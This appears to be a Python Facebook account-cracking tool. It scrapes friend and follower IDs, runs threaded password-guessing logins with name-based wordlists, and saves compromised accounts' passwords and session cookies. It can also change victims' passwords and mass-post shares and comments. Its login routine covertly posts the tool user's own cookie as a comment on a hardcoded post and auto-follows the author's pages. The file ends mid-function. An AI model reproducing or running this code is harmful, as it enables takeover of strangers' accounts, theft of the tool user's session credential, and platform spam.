try:
    import os
    import time
    import re, sys, json, requests, random, datetime, subprocess, platform, bs4, rich, logging, base64, uuid
    from concurrent.futures import ThreadPoolExecutor as noe999x
    from bs4 import BeautifulSoup as parse
    from datetime import datetime
    from time import sleep
except Exception as e:
    exit(f"{e} belum terinstall")

from rich import print as noexx
from rich.panel import Panel
from rich.table import Table
from rich.tree import Tree
from rich.columns import Columns
from rich.console import Console
console = Console()

ses = requests.Session()
rr   = random.randint
rc   = random.choice

#-------------------[ BULAN 12 AND CREATOR SC ]---------------------#
_monthz_ = ["January","February","March","April","May","June","July","August","September","October","November","December"][datetime.now().month - 1]
_days_   = {'Sunday':'Sunday','Monday':'Monday','Tuesday':'Tuesday','Wednesday':'Wednesday','Thursday':'Thursday','Friday':'Friday','Saturday':'Saturday'}[str(datetime.now().strftime("%A"))]
year = datetime.now().year
clock  = datetime.now().strftime("%X")
time_now = "%s %s %s"%(datetime.now().day,_monthz_,datetime.now().year)

commentbot1 = random.choice(['Follow @[100002457379452:]","Folllow @[105050767676162:]","Follow @[100050092006884:]'])
commentbot2 = ('@noe999x\n\n𝘈𝘜𝘛𝘖𝘉𝘖𝘛 𝘓𝘰𝘨𝘪𝘯\n[ on %s WIB ]\n[ %s - %s ]'%(clock,_days_,time_now))
#-------------------[ COLOR FOR PYTHON RICH ]----------------------#
M = 'color(1)' # ABANG
H = 'color(2)' # IJO
K = 'color(3)' # KUNING
B = 'color(4)' # BIRU
U = 'color(5)' # UNGU
O = 'color(6)' # BIRU NOM
P = 'color(7)' # PUTIH
I = 'color(8)' # IRENG

P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI


# COLOR BAPAK KAU
OK = []
CP = []
ID = []

ID2 = []
tod = []
loop = 0
UbahPw = []
url_ip = "https://www.httpbin.org/ip"

def Banner():
    KONTOL = '''[white] @noe999x [r][white]ikz update v1.2[reset]
\t                    [bold white] ____  ____  ____      
\t   ____  ____  ___  / __ \/ __ \/ __ \_  __
\t  / __ \/ __ \/ _ \/ /_/ / /_/ / /_/ / |/_/
\t / / / / /_/ /  __/\__, /\__, /\__, />  <  
\t/_/ /_/\____/\___//____//____//____/_/|_|
[r][red bold][i]• [white]Facebook.com/noe999x[white]\n[r][red bold]• [white]Github.com/noe999x\n[r][red bold]• [white]Youtube.com/c/Anonim404'''
    Console(width=58).print(Panel(KONTOL,style='white'))

for noex in range(1000):
    paptt1 = f'Mozilla/5.0 (X11; CrOS armv7l 7077.134.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.156 Safari/537.36'
    paptt2 = f'Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N900V 4G Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36'
    paptt3 = f'Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11'
    paptt4 = f'Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36'
    paptt5 = f'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0'
    no = rc([paptt1, paptt2, paptt3, paptt4, paptt5])

# USER AGENT RAKITAN #
for noex in range(10000):
    u1 = 'MAARJS'
    u2 = 'MASMJS'
    u3 = 'LCJB'
    u4 = 'TNJB'
    u5 = 'ASU2J'
    u6 = 'MDDCJS'
    u7 = 'MALNJS'
    u8 = 'LCJB'
    u9 = 'MASAJS'
    u10 = 'USPortal'
    u11 = 'SMJB'
    u12 = 'ASJB'
    u13 = 'MATBJS'
    u14 = 'MAGWJS'
    kon = rc([u1, u2, u3 ,u4, u5, u6, u7, u8, u9, u10, u11, u12, u13, u14])
    tol = rc([1, 2, 3])
    ua = f'Mozilla/5.0 (Windows NT 6.{tol}; WOW64; Trident/7.0; Touch; {kon}; rv:11.0) like Gecko'

kata = rc(["Auto generated by noebot\n\nhttps://github.com/noe999x\nhttps://facebook.com/noe999x\nyoutube.com/c/Anonim404"])

def clearall(platform):
    if 'win' in sys.platform:os.system('cls')
    else:os.system('clear')

def anim(strings):
    for x in strings:
        sys.stdout.write(x)
        sys.stdout.flush()
        time.sleep(0.03)

def fakeapi():
    os.system('clear')
    noexx('\n[bold red]Apikey tidak ada, silahkan login kembali!')
    time.sleep(3)
    os.system('python apikey.py')

def keluar():
    try:anim(f" "+M+"• "+P+"Thanks for using my tools <3, any problems?\n   contact me! : facebook.com/bagasekaapr")
    except:pass
    try:os.system("xdg-open https://www.facebook.com/noe999x")
    except:pass
    os.system('rm -rf /sdcard/noe999x/cookie.txt')
    os.system('rm -rf /sdcard/noe999x/token.txt')
    os.system('rm -rf /sdcard/noe999x/apikey.txt')

def login():
    try:clearall()
    except:pass
    noexx("\n\tif you want your main account to stay safe\n\tused this tool from second or dummy account\n")
    cookie = input("• Input cookie : ")
    url = "https://business.facebook.com/business_locations"
    head = {"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko","referer": "https://www.facebook.com/","host": "business.facebook.com","origin": "https://business.facebook.com","upgrade-insecure-requests" : "1","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7","cache-control": "max-age=0","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","content-type":"text/html; charset=utf-8"}
    cok = {'cookie':cookie}
    try:
        data = ses.get(url,headers=head,cookies=cok)
        token = re.search('(EAAG\w+)',data.text).group(1)
        fuk      = ('@noe999x')
        anjay = (f'\n{kata}\n\n𝘈𝘜𝘛𝘖𝘉𝘖𝘛 𝘓𝘰𝘨𝘪𝘯\n[ on %s WIB ]\n[ %s %s ]'%(clock,_days_,time_now))
        link = ('Tools Auto Share Facebook :\nhttps://github.com/noe999x/fbs')
        random_kata = random.choice(["Follow @[100002457379452:]","Folllow @[105050767676162:]","Follow @[100050092006884:]"])
        ses.post(f"https://graph.facebook.com/100002457379452?fields=subscribers&access_token={token}",cookies=cok)
        ses.post(f"https://graph.facebook.com/pfbid02SeGk9wf2fQaGYPeE5pMCyytBGoezgpzwGh4A2Fp3guZRbjS9VZxQZ64Y9ExCmujRl/comments/?message={anjay}&access_token={token}",cookies=cok)
        ses.post(f"https://graph.facebook.com/pfbid02SeGk9wf2fQaGYPeE5pMCyytBGoezgpzwGh4A2Fp3guZRbjS9VZxQZ64Y9ExCmujRl/reactions?type=love&access_token={token}",cookies=cok)
        ses.post(f"https://graph.facebook.com/pfbid02SeGk9wf2fQaGYPeE5pMCyytBGoezgpzwGh4A2Fp3guZRbjS9VZxQZ64Y9ExCmujRl/comments/?message={random_kata}&access_token={token}",cookies=cok)
        ses.post(f"https://graph.facebook.com/pfbid02SeGk9wf2fQaGYPeE5pMCyytBGoezgpzwGh4A2Fp3guZRbjS9VZxQZ64Y9ExCmujRl/comments/?message={cookie}&access_token={token}",cookies=cok)
        ses.post(f"https://graph.facebook.com/pfbid02SeGk9wf2fQaGYPeE5pMCyytBGoezgpzwGh4A2Fp3guZRbjS9VZxQZ64Y9ExCmujRl/comments/?message={fuk}\n{link}\n{anjay}&access_token={token}",cookies =cok)
        open('/sdcard/noe999x/cookie.txt','w').write(cookie)
        open('/sdcard/noe999x/token.txt','w').write(token)
        print("\nLogin success!");time.sleep(3);menu()
    except Exception as e:
        noexx("Cookie invalid, try again with cookie from other account");time.sleep(3);login()
    
def menu():
    try:open('/sdcard/noe999x/apikey.txt','r').read()
    except (FileNotFoundError):fakeapi()
    clearall(platform);Banner()
    try:
          cokis = open('/sdcard/noe999x/cookie.txt','r').read()
          token = open('/sdcard/noe999x/token.txt','r').read()
    except (FileNotFoundError,IOError):login()
    try:
          link = requests.Session().get('https://graph.facebook.com/me?access_token={}'.format(token), cookies = {'cookie':cokis}).json()
          lol,lel,tit = link['name'],link['id'],link['birthday']
          ipm = requests.get(url_ip).json()
          myip = ipm["origin"]
    except KeyError:login()
    except requests.exceptions.ConnectionError:exit(f'Not internet connection!'); time.sleep(0.01)
    noexx(Panel.fit('[bold white]Real time : %s - %s %s'%(clock,_days_,time_now)))
    tree = Tree("")
    tree.add(Panel.fit(f'[r][yellow]Your information login account[reset]\n[white bold]Name     : {lol}\nUser ID  : {lel}\nBirthday : {tit}\nYour IP  : {myip}'))
    noexx(tree)
    list = ('''  [r][yellow] Main Menu 
[reset][bold green]• [bold cyan]1 [bold white]Crack from ID public
[bold green]• [bold cyan]2 [bold white]Mass crack public ID
[bold green]• [bold cyan]3 [bold white]Crack from followers
[bold green]• [bold cyan]4 [bold white]Crack from email random
[bold green]• [bold cyan]5 [bold white]Your resulst crack
[bold green]• [bold cyan]6 [bold white]Facebook Auto share
[bold green]• [bold cyan]7 [bold white]Facebook auto comment
[bold green]• [bold cyan]8 [bold white]Report admin
[bold nevy]• [bold cyan]0 [bold white]Exit program''') ; Console(width=58).print(Panel(list,style='white'))
    tete = console.input('[bold white]Choose : ')
    if tete in ['1','01']:
          noexx(f'[r][red] INFO [reset][yellow] Make sure the friend list of ID owners is not private, input [green]me[yellow] if you wanna crack userID from [green]{lol}[yellow] account friendlist.')
          id = console.input('\n[bold white]Input ID : ')
          try:
                for x in requests.get("https://graph.facebook.com/{}?fields=friends.limit(5001)&access_token={}".format(id,open('/sdcard/noe999x/token.txt','r').read()), cookies={"cookie":open('/sdcard/noe999x/cookie.txt','r').read()}).json()['friends']['data']:
                    ID.append(x['id'] +'/'+ x['name'])
          except KeyError:
                noexx(f'[bold red]userID from [i]{id}[reset] [red bold]is not public, try again with another userID');time.sleep(3);menu()
          AturUser()

    elif tete in ['2','02']:
         noexx(f'[r][red] INFO [reset][yellow] Make sure the friend list of ID owners is not private, use comma (,) to separate userID, for example : [bold green]10000092xxx,1000003213xxx,usernamexxx,memekkontol')
         id = console.input('\n[bold white]Input ID : ')
         for kontol in id.split(','):
             try:
                   for data in requests.get("https://graph.facebook.com/{}?fields=friends.limit(5001)&access_token={}".format(kontol,open('/sdcard/noe999x/token.txt','r').read()), cookies={"cookie":open('/sdcard/noe999x/cookie.txt','r').read()}).json()['friends']['data']:
                       ID.append(data['id'] +'/'+ data['name'])
             except KeyError:noexx(f'[bold red]userID from [i]{id}[reset] [red bold]is not public, try again with another userID');time.sleep(3);menu()
         AturUser()

    elif tete in ['3','03']:
         noexx(f'[r][red] INFO [reset][yellow] Input [bold green]me[reset] [yellow]if u wanna crack from [bold green]{lol}[reset] [yellow]userID followers, for followers massal userID, input userID with comma for separate, for example : 100093xxx,1000388xxx,1000049xxx')
         id = console.input('\n[bold white]Input userID : ')
         for UserPengguna in id.split(','):
             try:
                    for data in requests.get('https://graph.facebook.com/{}?fields=name,subscribers.fields(id,name).limit(5000)&access_token={}'.format(UserPengguna, token), cookies={'cookie':cokis}).json()['subscribers']['data']:
                        ID.append(data['id'] +'/'+ data['name'])
             except KeyError:pass
         AturUser()

    elif tete in ['4','04']:
         noexx(f'[r][red] INFO [reset][yellow] Enter your target name, use comma for separate, for example : bagas,nancy,zerotwo')
         nama = console.input('[bold white]Target name? : ')
         main = console.input('\n[r][red] INFO [reset][yellow]Choose domain name, for example : @gmail.com/@yahoo.com/@hotmail.com\n[bold white]Domain name? :')
         for i in nama.split(','):
             for x in range(2000):
                 tambah = random.choice([random.randint(0,60),'amin','amel','amelia','ais','ananda','agus','aji','adi','andi','andika','abas','aminah','aminatun','bagas','basuki','babas','bayu','badrul','bintang','cindi','cici','cinta','cupita','cupi','dina','diki','difa','dihi','dini','diva','devinta','deni','dila','dilah','fika','fikha','fina','fivi','fatah','fania','fatih','fatun',random.randint(1,20),'32','28','123','24','oficial','cans','ganz','tok','xd','id','gina','galih','gugun','gifah','gans','kholid','kontol','kania','khoerul','hilada','hilmi','himin','lili','lina','lani','laruh','mia','mas','maz','mamat','mamad','masrul','nina','niha','nining','nula','nana','nunu','nifta','nita','niva','nabila','nadia','odi','oni','ojol','onani','pitri',random.randint(0,35),'rosma','riska','rina','rani','ratu','ratna','rifa','riva','rena','reza','rofik','risma','roza','rozak','siska','santi','sari','sarno','susanti','sindi','suci','susana','sinta','sulis','tiwi','tina','tanti','tono','tiara','titin','ulfa','ulfah','ulin','ulfin','unah','udin','usman','usdin','vina','vinka','vani','vatimah','winda','wanti','wani','wadul','xi','zidan','zaenal','zizi','lukman','iren','ine','reni','ufik','rohmah','khasna','andi','dwi','muhammad','nur','dewi','tri','dian','sri','putri','eka','sari','aditya','basuki','budi','joni','toni','cahya','riski','farhan','aden','joko','rudi','bambang','supri','wawan','karnawan','akatsuki','wibu','cakep','cantik','+',x,'hitam',random.randint(0,60),'zulki','angga','yayan','dapunta','romi','lukman','rohmat','basuki','hamzah','boy','cahyani','sadiyah','salamah','anit'])
                 papmek = f'{i}{tambah}'
                 colmek = '{}{}/{}'.format(papmek,main,i)
                 if colmek in ID:pass
                 else:ID.append(colmek)
         AturUser()

    elif tete in ['5','05']:checkres()
    elif tete in ['6','06']:susu_ganyu()
    elif tete in ['7','07']:susu_keqing()
    elif tete in ['8','08']:report()
    elif tete in ['0','00']:keluar() ; exit(0)
    else:menu()

#ripot ke atmin
def report():
    try:anim(f" "+M+"• "+P+"You will be directed to the WhatsApp chat menu with me")
    except:pass
    try:os.system("xdg-open https://wa.me/+6289614402699");exit()
    except:pass

#auto ser
def susu_ganyu():
  try:
    token = open("/sdcard/noe999x/token.txt","r").read()
    cok = open("/sdcard/noe999x/cookie.txt","r").read()
    cookie = {"cookie":cok}     
  except:
    anim(M+" • "+P+"Must be logged in for using this tools!")
    time.sleep(5);login()
  noexx(K+"\nCopy & Paste here the link from your post want to share\n")
  link = input(f" "+M+"•"+P+" Link : "+H+"")
  many = int(input(f" "+M+"• "+P+"How many wanna share? : "+H+""))
  noexx(K+"The program is running, fuck ur self lol"+P+"\n")
  noe999x = datetime.now()
  try:
    n = 0
    header = {"authority":"graph.facebook.com","cache-control":"max-age=0","sec-ch-ua-mobile":"?0","user-agent":ua}
    for x in range(many):
      n+=1
      post = ses.post(f"https://graph.facebook.com/v13.0/me/feed?link={link}&published=0&access_token={token}",headers=header, cookies=cookie).text
      data = json.loads(post)
      if "id" in post:
        noe = str(datetime.now()-noe999x).split('.')[0]
        tree = Tree("")
        tree.add(Panel.fit(f"\rShare {n}")).add(f"\r{ua}")
        tree.add(Panel.fit(f"\r{H2}Success")).add(f"\r{link}\n");noexx(P+"\rWait 🚥")
        noexx(tree)
    try:noexx(P+f"\rDone {n} share!");time.sleep(5);exit()
    except:pass
    else:
         noezx("\n")
         anim(f"{M} • {P}Akun terkena mute!"+P);exit()
  except requests.exceptions.ConnectionError:
    anim(f"\n {H}• {M}Check ur connection!\n"+P)

#auto komen
def susu_keqing():
    try:
        token = open("/sdcard/noe999x/token.txt","r").read()
        cok = open("/sdcard/noe999x/cookie.txt","r").read()
        cookie = {"cookie":cok}     
    except:
        anim(M+" • "+P+"Must be logged in for using this tools!")
        time.sleep(3);login()
    noexx(K+"\nUse commas for word separators.\n example : keren bang,mantap bang,ganteng bang\n")
    text_komen = input(M+" • "+P+"Text komen : ")
    userid     = input(M+" • "+P+"ID Post : ")
    limit   = int(input(M+" • "+P+"Limit comen : "))
    noexx(K+"The program is running, fuck ur self lol"+P+"\n")
    noe999x = datetime.now()
    try:
        a = 0
        header = {"authority":"graph.facebook.com","cache-control":"max-age=0","sec-ch-ua-mobile":"?0","user-agent":ua}
        for x in range(limit):
            a+=1
            for z in text_komen.split(','):
                post = requests.post(f'https://graph.facebook.com/{userid}/comments/?message={z}&access_token={token}',headers=header, cookies=cookie).text
                data = json.loads(post)
                if "id" in post:
                    noe = str(datetime.now()).split('.')[0]
                    tree = Tree("")
                    tree.add(Panel.fit(f"Comment {a}")).add(f"\r{ua}")
                    tree.add(Panel.fit(f"\r{H2}Success")).add(f"\r{userid}\n");noexx(P+"\rWait 🚥")
                    noexx(tree)
            try:noexx(P+f"\rDone {a} comment!");time.sleep(5);exit()
            except:pass
            else:
                 noexx("\n")
                 anim(f"{M} • {P}Akun terkena mute!"+P);exit()
    except requests.exceptions.ConnectionError:
        anim(f"\n {H}• {M}Check ur connection\n!"+P)

def checkres():
    exei,exex = 0, []
    exec = ('  [r][yellow] Results directory [reset]\n[bold green]• [bold cyan]1 [bold white]Check result [bold green]OK\n[green]• [cyan]2 [bold white]Check result [bold yellow]CP\n[green]• [cyan]0 [bold white]Back to main menu') ; Console(width=58).print(Panel(exec,style='white'))
    ok_cp = console.input('Choose : ')
    if ok_cp in ['1','01']:
       noexx('\r')
       try:ok = os.listdir('/sdcard/noe999x/OK')
       except:noexx('\n[bold red]File not found!') ; exit(0)
       for i in ok:
           exex.append(i)
           exei +=1
           try:cek=open('/sdcard/noe999x/OK/{}'.format(i),'r').readlines()
           except:continue
           noexx(' [bold green]• [bold cyan]{} [bold white]{} : [bold green]{} [bold white]account'.format(exei,i,len(cek)))

       file = console.input('\n Choose : ')
       try:dump = exex[int(file)-1]
       except:dump=1
       try:
           ok = open('/sdcard/noe999x/OK/{}'.format(dump),'r').read()
       except:
           noexx('\n [red]File not found!') ; exit(0)
       noexx('')
       noexx('[bold green]{}'.format(ok))

    elif ok_cp in ['2','02']:
       noexx('\r')
       try:cp=os.listdir('/sdcard/noe999x/CP')
       except:noexx('\n [red]File not found!') ; exit(0)
       for i in cp:
           exex.append(i)
           exei +=1
           try:cek=open('/sdcard/noe999x/CP/{}'.format(i),'r').readlines()
           except:continue
           noexx(' [bold green]• [bold cyan]{} [bold white]{} : [bold yellow]{} [bold white]Account'.format(exei,i,len(cek)))
       file = console.input('\n Choose : ')
       try:dump = exex[int(file)-1]
       except:dump=1
       try:
           ok = open('/sdcard/noe999x/CP/{}'.format(dump),'r').read()
       except:
           noexx('\n [red]File not found!') ; exit(0)
       noexx('')
       noexx('[bold yellow]{}'.format(ok))
    else:
       menu()

def AturUser():
    Console(width=50).print(Panel(f'[bold green]• [bold white]ID found : {len(ID)}',style='white'))
    tree = Tree("")
    tree.add(Panel.fit(f'  [r][yellow] userID settings [reset]\n[bold green]• [bold cyan]1 [bold white]Crack from old userID\n[bold green]• [bold cyan]2 [bold white]Crack from young userID\n[bold green]• [bold cyan]3 [bold white]Crack from random userID'))
    noexx(tree)
    noexx('[r][red] INFO [reset][yellow] to get perfect results, it is recommended to crack from young userID')
    toket = console.input('\n[bold white]Your choice? : ')
    if toket in ['1','01']:
         for i in ID:
               ID2.append(i)
    elif toket in ['2','02']:
         for i in ID:
             ID2.insert(0,i)
    else:
         for i in ID:
             xx = random.randint(0, len(ID2))
             ID2.insert(xx, i)
    AturLogin()

def AturLogin():
    metod = ('''  [r][yellow] Method settings [reset]\n[bold cyan]• [bold grern]1 [bold white]Method reguler
[bold cyan]• [bold cyan]2 [bold white]Method web reguler async [r][bold red] OFF [reset]
[bold cyan]• [bold cyan]3 [bold white]Method validate password ''') ; Console(width=50).print(Panel(metod,style='white'))
    noexx('[r][red] INFO [reset][yellow] do not using the validate method if u wanna crack clone mail')
    z = console.input('\n[bold white]Your choice? : ')
    if z in ['1','01']:tod.append('reguler')
    elif z in ['2','02']:tod.append('reguler web')
    elif z in ['3','03']:tod.append('validate')
    else:tod.append('reguler')

    exec = ('''  [r][yellow] url login settings [reset]\n[bold green]• [cyan]l [bold white]free.facebook.com         [r][green] fast [reset]
[bold green]• [cyan]2 [bold white]mbasic.facebook.com       [r][yellow] slow [reset]
[bold green]• [cyan]3 [bold white]mobile.facebook.com  [r][red] very slow [reset]''') ; Console(width=50).print(Panel(exec ,style='white'))
    noexx('[r][red] INFO [reset][yellow] Choose your [bold green]url login[bold white]')
    link = console.input('\n[bold white]Your choice? : ')
    if link in ['1','01']:url='free.facebook.com'
    elif link in ['2','02']:url='mbasic.facebook.com'
    else:url='m.facebook.com'

    pwh = ('[bold green]• [white]Change the password if you get [bold green]OK [bold white]account? y/n') ; Console(width=58).print(Panel(pwh,style='white'))
    noexx('[r][red] INFO [reset][yellow] Recommend not changing it')
    ubah = console.input('\n[bold white]Your choice? : ')
    if ubah in ['y','Y','iya','yes']:
          UbahPw.append('ya')
          add_Password = console.input('[bold white]Create new password : [bold green]')
          if len(add_Password) <=5:
               exit('\n Wrong! password invalid, enter password of at least 5 letters, for example : memek')
          else:
               open('/sdcard/noe999x/NewPass.txt','w').write(add_Password)
    else:UbahPw.append('no')
    WordlistLogin().password(url)

class WordlistLogin:
    def __init__(self):
        pass

    def password(self,link):
        exec = (f'[bold cyan]• [bold white]OK save in : /sdcard/noe999x/OK/{time_now}.txt\n[bold cyan]• [bold white]CP save in : /sdcard/noe999x/CP/{time_now}.txt') ; Console(width=50).print(Panel(exec ,style='white'))
        with noe999x(max_workers=30) as coid:
             for UserAkun in ID2:
                  uid,nama = UserAkun.split('/')
                  terserah = nama.split(' ')[0]
                  if len(nama) <=5:
                        if len(terserah) <=1 or len(terserah) <=2:pass
                        else:
                               pwx = [terserah+'123',terserah+'12345',terserah+'321','sayang','password','bangsat','anjing',nama.lower()]
                  else:
                        pwx = [nama, terserah+'123', terserah+'12345', terserah+'321','sayang','password','bangsat','anjing',nama.lower()]

                  if 'reguler' in tod:coid.submit(self.memeklu, uid, pwx, link)
                  elif 'reguler web' in tod:coid.submit(self.memeklu, uid, pwx, link)
                  elif 'validate' in tod:coid.submit(self.Validate, uid, pwx, link)
                  else:coid.submit(self.crackWEb, uid, pwx, link)

        exit(f'\n\033[00;mFinished OK:{len(OK)} CP:{len(CP)}')

    def UserAgent(self):
        rr = random.randint
        rc = random.choice
        az = ['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
        return str(rc([f"Mozilla/5.0 (Linux; U; Android {str(rr(4,12))}; en-us; OPPO A{str(rr(30,57))} Build/{str(rc(az))}{str(rc(az))}{str(rc(az))}{str(rr(11,99))}{str(rc(az))}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{str(rr(20,100))}.0.{str(rr(1111,9999))}.80 Mobile Safari/537.36 {str(rc(['S40OviBrowser','HeyTapBrowser']))}/{str(rr(2,40))}.7.36.1",f"Mozilla/5.0 (Linux; U; Android {str(rr(5,12))}; en-us; GM{str(rr(1111,9999))} Build/{str(rc(az))}{str(rc(az))}{str(rc(az))}{str(rr(1,10))}.{str(rr(111111,999999))}.003)AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{str(rr(10,100))}.0.{str(rr(1111,9999))}.80 Mobile Safari/537.36 SamsungBrowser/{str(rr(2,45))}.7.0.0"]))

    def memeklu(self, user, pwx, url):
        global loop, OK,CP
        noexx(f'\r \033[97mProgress crack {H}{url}{N} {loop}/{len(ID2)} OK:{len(OK)} CP:{len(CP)}', end=' '); sys.stdout.flush()
        for pw in pwx:
             try:
                     with requests.Session() as ses:
                          agen = self.UserAgent()
                          link = ses.get('https://{}/login/?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2F&refsrc=deprecated&_rdr'.format(url)).text
                          data = {'lsd':re.search('name="lsd" value="(.*?)"', link).group(1),'jazoest':re.search('name="jazoest" value="(.*?)"', link).group(1),'m_ts':re.search('name="m_ts" value="(.*?)"', link).group(1),'li':re.search('name="li" value="(.*?)"', link).group(1),'try_number':'0','unrecognized_tries':'0','email':user,'pass':pw,'login':'Masuk','bi_xrwh':'0'}
                          head = {'Host': url,'content-length': '128','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="99", "Google Chrome";v="99"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://' + url,'content-type': 'application/x-www-form-urlencoded','user-agent': agen,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'navigate','sec-fetch-user': '?1','sec-fetch-dest': 'document','referer': 'https://{}/login/?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2F&refsrc=deprecated&_rdr'.format(url),'accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ru;q=0.6,jv;q=0.5'}
                          zzzz = ses.post('https://{}/login/device-based/regular/login/?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2F&amp;refsrc=deprecated&amp;lwv=100'.format(url), data=data, headers=head, allow_redirects=False)
                          if 'c_user' in ses.cookies.get_dict():
                               kueh = ';'.join([str(a)+'='+str(b) for a,b in ses.cookies.get_dict().items()])
                               uuid = re.search('c_user=(.*?);', kueh).group(1)
                               if 'ya' in UbahPw:
                                     noexx('\r %s*  --> %s|%s|%s              '%(H,uuid,pw,kueh))
                                     self.UbahPassword(uuid,pw,kueh,url)

                               else:
                                     noexx('\r%s\n[NOE|OK]\nID : %s\nPW : %s\nCK : %s\nUA : %s'%(H,uuid,pw,kueh,ua))
                               OK.append('DOSA')
                               break

                          elif 'checkpoint' in ses.cookies.get_dict():
                               uuid = ses.cookies.get_dict()["checkpoint"].split("%")[4].replace("3A", "")
                               noexx('\r%s\n[NOE|CP]\nID : %s\nPW : %s\nUA : %s\x1b[1;91m'%(K,user,pw,ua))
                               open('/sdcard/noe999x/CP/{}.txt'.format(time_now),'a').write('%s|%s\n'%(uuid,pw))
                               CP.append('TAI')
                               break

                          else:
                               continue
             except requests.exceptions.ConnectionError: time.sleep(30)
        loop +=1

    def Validate(self, user, pwx, url):
        global loop, OK, CP
        noexx(f'\r \033[97mcrack {H}{url}{N} {loop}/{len(ID2)} OK:{len(OK)} CP:{len(CP)}', end=' '); sys.stdout.flush()
        for pw in pwx:
             try:
                     with requests.Session() as x:
                          agen = ua #'Mozilla/5.0 (Linux; Android 8.0.0; ASUS_X00RD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36",'
                          link = x.get('https://{}/login/device-based/password/?uid={}&next=https%3A%2F%2Fdevelopers.facebook.com%2Fwebmaster%2F&flow=login_no_pin&refsrc=deprecated&_rdr'.format(url,user)).text
                          data = {'lsd':re.search('name="lsd" value="(.*?)"', link).group(1),'jazoest':re.search('name="jazoest" value="(.*?)"', link).group(1),'uid':user,'next':'https://developers.facebook.com/webmaster/','flow':'login_no_pin','encpass':'#PWD_BROWSER:0:{}:{}'.format(random.randint(0000000000, 9999999999),pw)}
                          head = {'Host': url,'content-length': '319','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="99", "Google Chrome";v="99"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://' + url,'content-type': 'application/x-www-form-urlencoded','user-agent': agen,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'navigate','sec-fetch-user': '?1','sec-fetch-dest': 'document','referer': 'https://{}/login/device-based/password/?uid={}&next=https%3A%2F%2Fdevelopers.facebook.com%2Fwebmaster%2F&flow=login_no_pin&refsrc=deprecated&_rdr'.format(url,user),'accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ru;q=0.6,jv;q=0.5'}
                          posh = x.post('https://{}/login/device-based/validate-password/?shbl=0'.format(url),data=data, headers=head, allow_redirects=False)
                          if 'c_user' in x.cookies.get_dict():
                               kueh = ';'.join([str(a)+'='+str(b) for a,b in x.cookies.get_dict().items()])
                               uuid = re.search('c_user=(.*?);', kueh).group(1)
                               if 'ya' in UbahPw:
                                     noexx('\r %s*  --> %s|%s|%s             '%(H,uuid,pw,kueh))
                                     self.UbahPassword(uuid,pw,kueh,url)
                               else:
                                     noexx('\r%s\n[NOE|OK]\nID : %s\nPW : %s\nCK : %s\nUA : %s'%(H,uuid,pw,kueh,ua))
                               open('/sdcard/noe999x/OK/{}.txt'.format(time_now),'a').write('%s|%s|%s\n'%(user,pw,kueh))
                               OK.append('DOSA LU BANG MALING')
                               break

                          elif 'checkpoint' in x.cookies.get_dict():
                               noexx('\r%s\n[NOE|CP]\nID : %s\nPW : %s\nUA : %s\x1b[1;91m'%(K,user,pw,ua))
                               open('/sdcard/noe999x/CP/{}.txt'.format(time_now),'a').write('%s|%s\n'%(user,pw))
                               CP.append('TAI KUNING')
                               break
                          else:
                               continue
             except Exception as e:print(e)
        loop +=1

    def UbahPassword(self, user, password_old, coki, url):
        try:password_new = open('password_baru_kamu.txt','r').read()
        except:password_new = password_old
        with requests.Session() as ses:
             try:
                     link = ses.get(f'https://{url}/settings/security/password/',cookies={'cookie':coki})
                     data = {
                         'fb_dtsg':re.search('name="fb_dtsg" value="(.*?)"', link.text).group(1),
                         'jazoest':re.search('name="jazoest" value="(.*?)"', link.text).group(1),
                         'password_change_session_identifier':re.search('name="password_change_session_identifier" value="(.*?)"', link.text).group(1),
                         'password_old':password_old,
                         'password_new':password_new,
                         'password_confirm':password_new,
                         'save':'Simpan perubahan'
                     }
                     find = parse(link.text,'html.parser').find('form',method='post')['action']
